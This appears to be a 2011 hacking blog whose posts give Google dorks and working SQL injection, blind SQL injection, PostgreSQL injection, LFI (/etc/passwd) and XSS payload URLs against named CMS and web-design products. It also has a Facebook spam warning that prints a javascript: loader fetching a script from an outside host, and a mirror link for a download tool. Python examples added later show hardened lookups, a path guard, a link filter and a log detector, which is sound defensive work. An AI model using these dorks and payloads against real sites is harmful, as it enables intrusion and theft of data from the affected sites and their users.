Wednesday, June 15, 2011

Axel Accelerator for Windows

I googled a bit and found someone who shared this Axel accelerator for Windows users.

Download here.
http://www.mediafire.com/?wi8dw1hbaqinhfz

Extract and just use it!

Usage is as below:
Usage: axel.exe [options] url1 [url2] [url...]

--max-speed=x          -s x    Specify maximum speed (bytes per second)
--num-connections=x    -n x    Specify maximum number of connections
--output=f             -o f    Specify local output file
--search[=x]           -S [x]  Search for mirrors and download from x servers
--header=x             -H x    Add header string
--user-agent=x         -U x    Set user agent
--no-proxy             -N      Just don't use any proxy server
--quiet                -q      Leave stdout alone
--verbose              -v      More status information
--alternate            -a      Alternate progress indicator
--help                 -h      This information
--version              -V      Version information

credit to

// ghuntley https://github.com/ghuntley/cygwin-axel/
// ~n2j3 http://st0rage.org/~n2j3/

Monday, June 6, 2011

Web Wiz Site News Vulnerable to SQL Injection

#####################################################################
## Title : Web Wiz Site News Vulnerable to SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: http://www.webwiz.co.uk/ ##
## Dork : Powered by Web Wiz Site News ##
#####################################################################

- POC -
http://site.com/news/news_item.asp?NewsID=[SQL]

- Thanks -
p0pc0rn

edit: found by others already. http://www.1337day.com/exploits/15677

Friday, June 3, 2011

El Espejo Web Design Vulnerable to Multiple SQL Injection

#####################################################################
## Title : El Espejo Web Design Vulnerable to Multiple SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: http://www.elespejodesign.com.ar/sitio/index.php ##
## Dork : !@#$%^&*()_ ##
#####################################################################

- POC -
http://site.com/sitio/something.php?id=[SQL]
http://site.com/sitio/detalle_foto.php?id=-236 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(version(),0x3a,user(),0x3a,database()),16,17,18,19--

http://site.com/sitio/detalle_edificios.php?id=-144 UNION SELECT 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--

Not just parameter index.php, there are more parameters vulnerable. Check it out.

- Thanks -
p0pc0rn

Inmueblesoft CMS Vulnerable to Multiple SQL Injection


##################################################################
## Title : Inmueblesoft CMS Vulnerable to Multiple SQL Injection ##
## Found by : p0pc0rn ##
## Vendor: www.inmueblesoft.com ##
## Dork : intext:"Inmueblesoft" filetype:php ##
#################################################################


- POC -
http://site.com/index.php?tabla=something&id=[SQL]
http://site.com/index.php?tabla=something&id=-15 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95--



Not just parameter index.php, there are more parameters vulnerable. Check it out.

- Thanks -
p0pc0rn
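
Added example (not part of the original posts and not any vendor's code): the numeric id parameter behind the UNION SELECT POCs in these posts, shown as string concatenation next to an input-validated, parameter-bound lookup. The items table, the function names and the SQLite backend are assumptions made so the example runs offline.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data standing in for a site's content table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO items VALUES (15, 'Flat for rent', 'Two rooms')")
    return db

def lookup_concatenated(db, raw_id):
    # The flaw behind each id=[SQL] POC: the request value becomes SQL text.
    return db.execute(
        "SELECT id, title, body FROM items WHERE id = " + raw_id
    ).fetchall()

def lookup_hardened(db, raw_id):
    # 1) Accept only the expected shape, 2) bind the value instead of splicing it.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None  # caller answers 400/404 without running a query
    return db.execute(
        "SELECT id, title, body FROM items WHERE id = ?", (int(raw_id),)
    ).fetchall()

# Same shape as the POCs above, adapted to SQLite and three columns:
# a negative id so no real row matches, then UNION SELECT with a version call.
PAYLOAD = "-15 UNION SELECT 1,sqlite_version(),3--"

def demo():
    db = make_db()
    return {
        "normal": lookup_hardened(db, "15"),
        "concatenated": lookup_concatenated(db, PAYLOAD),
        "hardened": lookup_hardened(db, PAYLOAD),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The concatenated lookup returns the database version in the title column; the hardened lookup never reaches the database with that input.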

Monday, May 23, 2011

Acuity CMS Vulnerable to Blind SQL Injection


Title : Acuity CMS Vulnerable to Blind SQL Injection
Found by : p0pc0rn
Dork : intext:"Powered by Acuity CMS."
Web : http://www.acuitycms.com/


SQL Injection
----------------
http://www.site.com/browse.asp?page=[Blind SQL]

POC
----
http://www.site.com/browse.asp?page=255+or+1=1 TRUE
http://www.site.com/browse.asp?page=255+or+1=2 FALSE

thanks,
-p0pc0rn-

Golden IT Solutions Web Design Vulnerable to SQL Injection

Title : Golden IT Solutions Web Design Vulnerable to SQL Injection
Found by : p0pc0rn
Dork : intext:"Developed By : Golden IT Solutions"

SQL Injection
----------------
http://www.site.com/anypath.php?ID=[SQL]

POC
----
http://www.site.com/memProfile.php?ID=-2800 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--



thanks,
-p0pc0rn-

Saturday, May 21, 2011

New LFI Exploit found :)

New LFI Exploit found :)
-------------------------
By p0pc0rn May 2011
Dork: inurl:"index.php?loc=subindex"
Exploit :

site.com/index.php?loc=../../../../../../../../../../../../../../../etc/passwd





thanks
-p0pc0rn-
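
Added example (not part of the original post and not the affected site's code): one way to serve a loc-style page parameter so that ../ sequences cannot leave the page directory. The pages/ layout, the .php suffix and the function name resolve_page are assumptions for illustration.

```python
import os
import tempfile
from pathlib import Path

def resolve_page(base_dir, loc):
    """Map ?loc=<name> to <base_dir>/<name>.php, or None when it must be refused."""
    base = Path(base_dir).resolve()
    if not loc or "\x00" in loc or os.path.isabs(loc):
        return None
    # resolve() collapses ".." and follows symlinks before the containment check.
    candidate = (base / (loc + ".php")).resolve()
    if base not in candidate.parents:
        return None
    return candidate if candidate.is_file() else None

def demo():
    # Constructed layout: pages/ holds includable files, config.php sits outside it.
    with tempfile.TemporaryDirectory() as root:
        pages = Path(root, "pages")
        pages.mkdir()
        (pages / "subindex.php").write_text("<?php /* page */ ?>")
        Path(root, "config.php").write_text("<?php /* secrets */ ?>")
        requests = ["subindex", "../config", "../" * 15 + "etc/passwd", "/etc/passwd"]
        return {loc: resolve_page(pages, loc) is not None for loc in requests}

if __name__ == "__main__":
    for loc, served in demo().items():
        print("served " if served else "refused", loc)
```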

Wednesday, May 11, 2011

New WallSpam Using Javascript in Facebook

New WallSpam Using Javascript in Facebook
------------------------------------------

If you notice a wall post like this, NEVER EVER CLICK IT!!
[spam]Not like Justin Biebier which always never say never.He's an idiot [/spam]

Take note of the URL shown at the bottom of your browser. When you click the link, you will execute JavaScript that posts it on your wall.
javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();
http://pelorak.info/verify.js
<--bad evil code!!



I tried to click and this is what appeared.


And then it'll redirect you to here

So, just like others, your profile will be full of spam.
Beware, more will come after this. Someone will take this as an opportunity to have fun.
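
Added example (not part of the original post and not Facebook's code): a link filter of the kind a site can apply to user-posted links so that javascript: URLs like the one above are never rendered as clickable. The function name safe_link and the sample inputs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Browsers drop tab, CR and LF anywhere in a URL and ignore leading
# control characters and spaces, so normalise the same way before judging.
_DROPPED = re.compile(r"[\t\r\n]")
_EDGE = "".join(chr(c) for c in range(0x21))

def safe_link(href):
    """Return the cleaned href if it is an absolute http(s) URL, else None."""
    cleaned = _DROPPED.sub("", href).strip(_EDGE)
    try:
        parts = urlsplit(cleaned)
    except ValueError:
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return cleaned

# Constructed inputs; the first has the shape of the wall-post link above.
SAMPLES = [
    "javascript:(function(){var s=document.createElement('script');})();",
    "JaVa\tScRiPt:void(0)",
    " \x01javascript:void(0)",
    "data:text/html,hello",
    "https://example.com/photo?id=7",
]

def demo():
    return [safe_link(s) for s in SAMPLES]

if __name__ == "__main__":
    for sample, result in zip(SAMPLES, demo()):
        print(repr(sample), "->", result)
```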

Tuesday, May 3, 2011

Creatop Web Design Vulnerable to PostgreSQL Injection


Title : Creatop Web Design Vulnerable to PostgreSQL Injection
Vendor: http://www.creatop.com.au/
Found : by p0pc0rn
Dork : intext:"by Creatop" filetype:cfm


PostgreSQL Injection
-------------------
http://www.victim.com/index.cfm?MenuID=[Injection]

Example:
http://www.victim.com/index.cfm?MenuID=80 and 1=cast(version() as int)
### ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit" ###



.:p0pc0rn:.

Saturday, April 30, 2011

PakCyber Web Design Multiple Vulnerabilities


Title : PakCyber Web Design Multiple Vulnerabilities
Found : by p0pc0rn
Vendor: http://pakcyber.com/
Dork : intext:"Powered By PakCyber"


Blind SQL Injection
-------------------

http://www.victim.com/site.php?article_id=[Blindey]
Eg:
http://www.victim.com/full_article_text.php?article_id=808 and 1=1 TRUE
http://www.victim.com/full_article_text.php?article_id=808 and 1=2 FALSE

http://www.victim2.com/site.php?cid=[Blindey]
Eg:
http://www.victim2.com/university.php?cid=8 or 1=1-- TRUE
http://www.victim2.com/university.php?cid=8 or 1=2-- FALSE



http://www.victim3.com/site.php?CatId=[Blindey]
Eg:
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=1-- TRUE
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=2-- FALSE

There are more parameters that need to be checked out. High possibility there's a SQL injection vulnerability too.

Cross Site Scripting
--------------------
http://www.victim.com/CategoryDetails.php?CatId=44&CatName=[XSS]

thanks,
#p0pc0rn#
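
Added example (not part of the original posts): detection logic for the TRUE/FALSE probing pattern shown in the blind SQL injection posts, run over web access logs. The log lines are constructed, and the combined-log layout and function name are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined-log style), not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Apr/2011:10:00:01 +0000] "GET /full_article_text.php?article_id=808 HTTP/1.1" 200 5120
203.0.113.7 - - [30/Apr/2011:10:00:05 +0000] "GET /full_article_text.php?article_id=808%20and%201=1 HTTP/1.1" 200 5120
203.0.113.7 - - [30/Apr/2011:10:00:09 +0000] "GET /full_article_text.php?article_id=808%20and%201=2 HTTP/1.1" 200 812
198.51.100.4 - - [30/Apr/2011:10:01:00 +0000] "GET /university.php?cid=8 HTTP/1.1" 200 4000
198.51.100.9 - - [30/Apr/2011:10:02:00 +0000] "GET /search.php?q=rock+and+roll HTTP/1.1" 200 900
"""

LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)')
# A numeric comparison glued onto a value with AND/OR: "808 and 1=1", "8 or 1=2--".
PROBE = re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*(\d+)", re.IGNORECASE)

def find_boolean_probes(log_text):
    """Flag (client, path, param) that received both a true and a false comparison."""
    seen = defaultdict(dict)  # key -> {True: response size, False: response size}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, target, _status, size = m.groups()
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            probe = PROBE.search(value)
            if probe:
                truth = probe.group(1) == probe.group(2)
                seen[(client, parts.path, name)][truth] = int(size)
    findings = []
    for (client, path, name), sizes in sorted(seen.items()):
        if True in sizes and False in sizes:
            # Differing sizes mean the injected condition changed the page.
            findings.append({"client": client, "path": path, "param": name,
                             "size_differs": sizes[True] != sizes[False]})
    return findings

if __name__ == "__main__":
    for finding in find_boolean_probes(SAMPLE_LOG):
        print(finding)
```

A finding with size_differs set is the one to triage first: the page responded differently to the true and false conditions, so the parameter is likely reaching the query unfiltered.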